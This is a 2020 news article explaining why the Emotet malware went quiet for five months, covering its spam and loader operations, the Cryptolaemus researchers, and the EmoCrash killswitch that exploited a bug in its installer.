Published on August 26th, 2020 📆 | 8318 Views ⚑0
Emotet: Why did the ‘most wanted’ malware go on a 5-month hiatus?
Emotet is more than a malware. The threat group attacks networks and rents out access to other group like crypto-miners, banking trojans and ransomwares. Since its return in mid-July, the malware has impacted 5% of organisations globally.
(Subscribe to our Today’s Cache newsletter for a quick snapshot of top 5 tech stories. Click here to subscribe for free.)
The most wanted malware returned after a five-month hiatus in mid-July 2020. It marked its return by sending waves of spam campaigns affecting organisations globally.
Known as Emotet among the cyber security community, the malware group broke its period of inactivity in July with a massive threat campaign with well over 250,000 emails containing malicious macros.
In the same month, it impacted 5% of organisations globally and made to the top of Global Threat Index, according to Check Point Research, a cyber security firm.
A malware is a software intentionally used to damage computer networks to steal data. The stolen information is often sold on the dark web or given back to the owner for a ransom. At other times, cybercriminals just put them out in the open.
Emotet operators were spreading malspam campaigns both by themselves and at other times supporting other threat actors to steal banking credentials and gain illicit access into infected networks.
The group’s method is simple; it sends a malicious document named “form.doc” or “invoice.doc” via email to an unsuspecting user.
Once that person opens the attachment, the malware is deployed a PowerShell that runs codes from remote websites to spread the threat to the entire network the user is connected to.
The infected network will then be added to the Emotet’s botnet. That means the hacker takes full control over the network from a remote location.
‘Malware as a Service’ model
This type of attack is called a ‘loader’ operation; and Emotet is said to be one of the biggest players in the cybercrime world as other malware operators like TrickBot and Qbot rent access from ‘most wanted’ malware.
Emotet rents out infected networks to other threat actors like cryto-miners, banking trojans and ransomware installers to gain illicit access into company servers.
The malware is said to be operated from Russia, and its operator is nicknamed Ivan by cyber security researchers.
Its operations did not start out as Malware as a Service (MaaS) business model six years ago when it started to gain prominence in the cybercrime world.
Back in 2014, Emotet surreptitiously entered user’s devices as a banking trojan, lurked inside and stole their credentials and passwords.
In just a few years, the malware has metamorphosed from a mere one-off hacker into an infrastructure provider for other threat actors to run campaigns and steal data.
Its unique way of infecting networks by spreading the threat laterally after gaining access to just a few devices in the network makes it one of the toughest malwares to beat.
Emotet’s self-propagating feature presents a particular challenge to organisations as the victims can get affected even without clicking the malicious links.
“Once on a computer, Emotet downloads and executes a spreader module that contains a password list that it uses to attempt to brute force access to other machines on the same network,” Symantec security said in a blog post.
Cryptolaemus – the Mealybug hunter group
During 2016 and the following year, Emotet, also know as the Mealybug, transformed from a being a small group of hackers who stole money from bank accounts to a malware loader that gave access to other threat groups.
It changed its codebase to infect victims and allow other malware operators rent the network.
And as the number of threat campaigns using Emotet increased, a group of security researchers from different organisations decided to come together and share threat intelligence on the malware.
In 2018, they formed a group called Cryptolaemus to share details about indicators of compromise (IoC) with the broader infosec community. The group posted updates on their web page and twitter handle. Their singular goal is to shut down the Mealybug.
The details shared by the group was used by other companies’ network administrators to detect any threat early on. Interestingly, the group’s notes were also followed by Emotet operators.
“We have seen them [Emotet] change tactics minutes after our posts, often enough that it is more than simple coincidence. I am quite sure they are part of the many reading our posts as soon as they go live,” Joseph Roosen, a Cryptolaemus member and cyber security expert told ZDnet.
Roosen also shared that the group has “even joked that they (Emotet) are now calling the three botnets as Epoch 1, Epoch 2, and Epoch 3 internally (based on the names we assigned them).”
The team has had some initial success in helping companies battle Emotet.
As a matter of fact, the malware group did stop its campaign for some time, almost a year after the bug-hunting group started sharing information.
“It’s interesting that Emotet was dormant for several months earlier this year, repeating a pattern we first observed in 2019,” said Maya Horowitz, Director, Threat Intelligence & Research, Products at Check Point.
But it turned out that Emotet was actually updating its features and capabilities to enhance future attacks. They were not planning to tap out yet.
The vulnerability and the vaccine
Emotet attacks surged in late 2019 and went on until February 2020. Just when the pandemic was affecting many countries, the malware’s campaign slowed down to a halt.
The reason: someone from the Cryptolaemus group found a vulnerability in the malware.
“Just as attackers can exploit flaws in legitimate software to cause harm, defenders can also reverse-engineer malware to discover its vulnerabilities and then exploit those to defeat the malware,” James Quinn, security analyst at Binary Defense said in blog post.
Quinn discovered a bug in Emotet that could be exploited. He spotted a change in the malware’s persistence mechanism, a code the outlives computer reboots.
In early Feburary, Emotet had released a massive codebase overhaul that revealed changes it is installation and persistence mechanism.
As part of the change, the malware had removed word list and file generation algorithm, which were used in its past installs.
Instead, Emotet replaced a new algorithm that generated a filename to save the malware on each victim system by randomly chosen exe or dll system file name.
This filename was encrypted with an exclusive key and saved into a registry value set to the victim’s volume serial number.
“Around 37 hours after Emotet unveiled these changes, James Quinn finished the first version of the killswitch (or vaccine) that eventually became EmoCrash,” Binary Defense said in a blog post.
The killswitch would generate the registry key value for each victim and set the data for them to null.
When Emotet would check Registry for the install marker, it would find the newly-generated null value and generate the exe name “.exe”, it added.
While this mechanism worked, it was very messy and still allowed Emotet to install—it just prevented Emotet from running successfully and reaching out over the network.
Quinn wanted to enhance the effectiveness of the killswitch so that it could pre-empt an Emotet attack.
His second version exploited a simple buffer overflow discovered in Emotet’s installation routine, which caused Emotet to crash during malware install, but before the malware would drop itself to the normal Emotet install locations, thus completely preventing malware installation.
Quinn and the team of infosec researchers kept the killswitch private so that the malware actors would not know about the vaccine they found.
This killswitch was alive between Feb 6th, 2020 – Aug 6th, 2020, or 182 days – – a period of Emotet’s hiatus.